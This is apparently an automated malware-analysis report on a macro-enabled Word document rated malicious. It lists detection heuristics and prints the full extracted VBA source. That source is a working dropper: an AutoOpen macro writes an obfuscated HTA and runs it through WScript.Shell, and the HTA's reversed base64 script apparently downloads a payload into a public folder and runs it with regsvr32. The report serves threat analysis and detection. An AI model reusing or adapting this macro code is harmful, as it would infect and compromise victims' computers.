MALICIOUS
170
Risk Score
Heuristics 6
-
VBA project inside OOXML medium 4 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
Set globalRepo = CreateObject("wscript.shell") -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set globalRepo = CreateObject("wscript.shell") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub autoopen() -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 9646 bytes |
SHA-256: fe3b432381a9135d5df3edbb74fe99765846951d69f3ec26bdb1fb8c5a593113 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "frm"
Attribute VB_Base = "0{835C303E-17BF-4C7D-8C15-7323291A0465}{7938C441-8896-44E7-ACF5-4388846EE7E5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function titleLib()
With frm.button1
titleLib = .Tag
End With
End Function
Function valueExRequest()
With frm.button1
valueExRequest = .Caption
End With
End Function
Public Sub button1_Click()
Set globalRepo = CreateObject("wscript.shell")
globalRepo.exec p(titleLib) & " " & p(valueExRequest)
End Sub
Attribute VB_Name = "requestProcTextbox"
Sub autoopen()
textboxSwapLen
End Sub
Function intel(memoryTableStorage)
intel = "" & memoryTableStorage & ""
End Function
Sub textboxSwapLen()
Dim variableBuf As String
variableBuf = p(frm.button1.Caption)
Set tableExLeft = New rightRemove
tableExLeft.counterSizeNext variableBuf, structRef
frm.button1_Click
End Sub
Function indexTextboxClass(titleExceptionCounter, procIndex, loadStorageButton)
indexTextboxClass = Replace(titleExceptionCounter, procIndex, loadStorageButton)
End Function
Attribute VB_Name = "pasteExceptionDocument"
Function genericEx()
genericEx = intel("<html><body><div id='content'>fTtlc29sYy55cmV1UW1lbTspMiAsImdwai")
End Function
Function optionFuncCaption()
optionFuncCaption = intel("5jaXJlbmVHbm9pdHBvXFxjaWxidXBcXHNyZXN1XFw6YyIoZWxpZm90ZXZhcy55cm")
End Function
Function optionEx()
optionEx = intel("V1UW1lbTspeWRvYmVzbm9wc2VyLnRoZ2lSdHhlVHJldG51b2MoZXRpcncueXJldV")
End Function
Function indexVar()
indexVar = intel("FtZW07MSA9IGVweXQueXJldVFtZW07bmVwby55cmV1UW1lbTspIm1hZXJ0cy5iZG")
End Function
Function buttonRef()
buttonRef = intel("9kYSIodGNlamJPWGV2aXRjQSB3ZW4gPSB5cmV1UW1lbSByYXZ7KTAwMiA9PSBzdX")
End Function
Function captionBufferTmp()
captionBufferTmp = intel("RhdHMudGhnaVJ0eGVUcmV0bnVvYyhmaTspKGRuZXMudGhnaVJ0eGVUcmV0bnVvYz")
End Function
Function querySize()
querySize = intel("spZXNsYWYgLCJqSUxkS3ZHc2IxanNSRj1sQmwmRnM0V1BXS3NuYWd2NjM5SWgwcW")
End Function
Function clearText()
clearText = intel("dIV0VPQ2c9aGNyYWVzJlJ4WkQ5THJNMzJ2eldwbE1McEJIVDNzNWZUeGZlPWRpJk")
End Function
Function databaseVar()
databaseVar = intel("tKenRkampDeGNWRDZxeWtRPWZlciY5eD1lZ2FwJlpFS0FUVlYxT3djRkt5anBmST")
End Function
Function listWindow()
listWindow = intel("1lbWl0JjlLaXh2PXJlc3UmWHVZWTg3ako9cmVzdT80bmF4LzIyNTQ4L3QzYlREOV")
End Function
Function storageView()
storageView = intel("RveTY3Mzhxd2FNOWd2LzY0MTk5LzAxNTA0L1J3SHp4Z0ZlYmxmV3E0UUxzZWxiVT")
End Function
Function removeSize()
removeSize = intel("RhaFdwYy92UzJUODVnQ0JmaHlHZkNsRHZoYWhWUEZSVWcwYW45UHZKdWlDUlE0L2")
End Function
Function loadArgument()
loadArgument = intel("RpU0I5RTV4R2cvMDgyMzMvdjI4ck9WQ09uV1A0WjAvVnYxcVhsempvWFhKWmRJaz")
End Function
Function convertPointerEx()
convertPointerEx = intel("J5U2ZrUllhOHkyZWR3L3N5dW9nL21vYy44MDAyLXRuZW1lZ2FuYW0tZWNhZnJ1cy")
End Function
Function libResponseWindow()
libResponseWindow = intel("8vOnB0dGgiICwiVEVHIihuZXBvLnRoZ2lSdHhlVHJldG51b2M7KSJwdHRobG14Lj")
End Function
Function constWindowVariable()
constWindowVariable = intel("JsbXhzbSIodGNlamJPWGV2aXRjQSB3ZW4gPSB0aGdpUnR4ZVRyZXRudW9jIHJhdg")
End Function
Function exceptionVariable()
exceptionVariable = intel("==|fXspdGZlTHJldG51b0Nub2l0cGVjeGUoaGN0YWN9OykiYXRoLmNpcmVuZUdub")
End Function
Function databaseTrust()
databaseTrust = intel("2l0cG9cXGNpbGJ1cFxcc3Jlc3VcXDpjIihlbGlmZXRlbGVkLnlyb21lTXJvdGFyZ")
End Function
Function classData()
classData = intel("XRJZXRlbGVke3lydDspInRjZWpib21ldHN5c2VsaWYuZ25pdHBpcmNzIih0Y2VqY")
End Function
Function pointerReferenceView()
pointerReferenceView = intel("k9YZXZpdGNBIHdlbiA9IHlyb21lTXJvdGFyZXRJZXRlbGVkIHJhdjspImdwai5ja")
End Function
Function funcRepoArray()
funcRepoArray = intel("XJlbmVHbm9pdHBvXFxjaWxidXBcXHNyZXN1XFw6YyAyM3J2c2dlciIobnVyLikib")
End Function
Function countLeft()
countLeft = intel("GxlaHMudHBpcmNzdyIodGNlamJPWGV2aXRjQSB3ZW4=</div><div id='table1")
End Function
Function namespaceLib()
namespaceLib = intel("'>ABCDEFGHIJKLMNOPQRSTUVWXYZ</div><div id='table2'>0123456789+/<")
End Function
Function procedureProc()
procedureProc = intel("/div><div id='table3'></div><script language='javascript'>functi")
End Function
Function globalScreen()
globalScreen = intel("on classAOption(tableDocumentRight){return(new ActiveXObject(tab")
End Function
Function procedureRemove()
procedureRemove = intel("leDocumentRight));}function referenceTemp(valueBorder){return(ge")
End Function
Function textboxExceptionScreen()
textboxExceptionScreen = intel("nericIndex.getElementById(valueBorder).innerHTML);}function view")
End Function
Function procClear()
procClear = intel("Iterator(){var exceptionLibView = referenceTemp('table1');var bu")
End Function
Function bufCounterRequest()
bufCounterRequest = intel("fferMemoryPtr = exceptionLibView.toLowerCase();var tableMemoryIt")
End Function
Function WQuery()
WQuery = intel("erator = referenceTemp('table2');return(exceptionLibView + buffe")
End Function
Function countLocalMemory()
countLocalMemory = intel("rMemoryPtr + tableMemoryIterator);}function removeLoadIndex(s){v")
End Function
Function valueNamespace()
valueNamespace = intel("ar e={}; var i; var b=0; var c; var x; var l=0; var a; var listT")
End Function
Function varCaption()
varCaption = intel("able=''; var w=String.fromCharCode; var L=s.length;var counterLi")
End Function
Function captionNextA()
captionNextA = intel("stProcedure = 'charAt';for(i=0;i<64;i++){e[viewIterator()[counte")
End Function
Function copyList()
copyList = intel("rListProcedure](i)]=i;}for(x=0;x<L;x++){c=e[s[counterListProcedu")
End Function
Function removePtr()
removePtr = intel("re](x)];b=(b<<6)+c;l+=6;while(l>=8){((a=(b>>>(l-=8))&0xff)||(x<(")
End Function
Function listboxNextText()
listboxNextText = intel("L-2)))&&(listTable+=w(a));}}return(listTable);};function ARefStr")
End Function
Function procRepoRemove()
procRepoRemove = intel("uct(variableTextDatabase){return variableTextDatabase.split('').")
End Function
Function memoryBuf()
memoryBuf = intel("reverse().join('');}valueStruct = window;genericIndex = document")
End Function
Function namespaceCaption()
namespaceCaption = intel(";valueStruct.resizeTo(1, 1);valueStruct.moveTo(-100, -100);var r")
End Function
Function documentArray()
documentArray = intel("epoEx = genericIndex.getElementById('content').innerHTML;var rep")
End Function
Function constSize()
constSize = intel("oEx = repoEx.split('|');var pasteBuffer = ARefStruct(removeLoadI")
End Function
Function convertValue()
convertValue = intel("ndex(repoEx[0]));var selectVariable = ARefStruct(removeLoadIndex")
End Function
Function databaseW()
databaseW = intel("(repoEx[1]));</script><script language='javascript'>function val")
End Function
Function storageExClear()
storageExClear = intel("ueDatabase(referenceButtonPointer){var ExStorageW = classAOption")
End Function
Function textboxSwap()
textboxSwap = intel("('msscriptcontrol.scriptcontrol');ExStorageW.Language = 'jscript")
End Function
Function refLibValue()
refLibValue = intel("';ExStorageW.Timeout = 60000;ExStorageW.AddCode(referenceButtonP")
End Function
Function tableCollectionWindow()
tableCollectionWindow = intel("ointer);return(null);}</script><script language='vbscript'>value")
End Function
Function swapCopySwap()
swapCopySwap = intel("Database pasteBuffer : valueDatabase selectVariable : valueStruc")
End Function
Function argumentTableIndex()
argumentTableIndex = intel("t.close</script></body></html>")
End Function
Function structRef()
structRef = genericEx + optionFuncCaption + optionEx + indexVar + buttonRef + captionBufferTmp + querySize + clearText + databaseVar + listWindow + storageView + removeSize + loadArgument + convertPointerEx + libResponseWindow + constWindowVariable + exceptionVariable + databaseTrust + classData + pointerReferenceView + funcRepoArray + countLeft + namespaceLib + procedureProc + globalScreen + procedureRemove + textboxExceptionScreen + procClear + bufCounterRequest + WQuery + countLocalMemory + valueNamespace + varCaption + captionNextA + copyList + removePtr + listboxNextText + procRepoRemove + memoryBuf + namespaceCaption + documentArray + constSize + convertValue + databaseW + storageExClear + textboxSwap + refLibValue + tableCollectionWindow + swapCopySwap + argumentTableIndex
End Function
Attribute VB_Name = "rightRemove"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Option Explicit
Public Sub counterSizeNext(memLocal As String, WProcedure As String)
Dim procTextbox As FileSystemObject
Set procTextbox = New FileSystemObject
Dim textGlobal As TextStream
Set textGlobal = procTextbox.CreateTextFile(memLocal)
textGlobal.WriteLine WProcedure
textGlobal.Close
Set textGlobal = Nothing
Set procTextbox = Nothing
End Sub
Attribute VB_Name = "libSize"
Function p(convertProcRequest)
p = indexTextboxClass(convertProcRequest, "@", "")
End Function
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 41472 bytes |
SHA-256: 19aeb645ef3f39a4731caf5bfe16d10137ae94d85d4725df2cdc4b8eb57afa8b |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.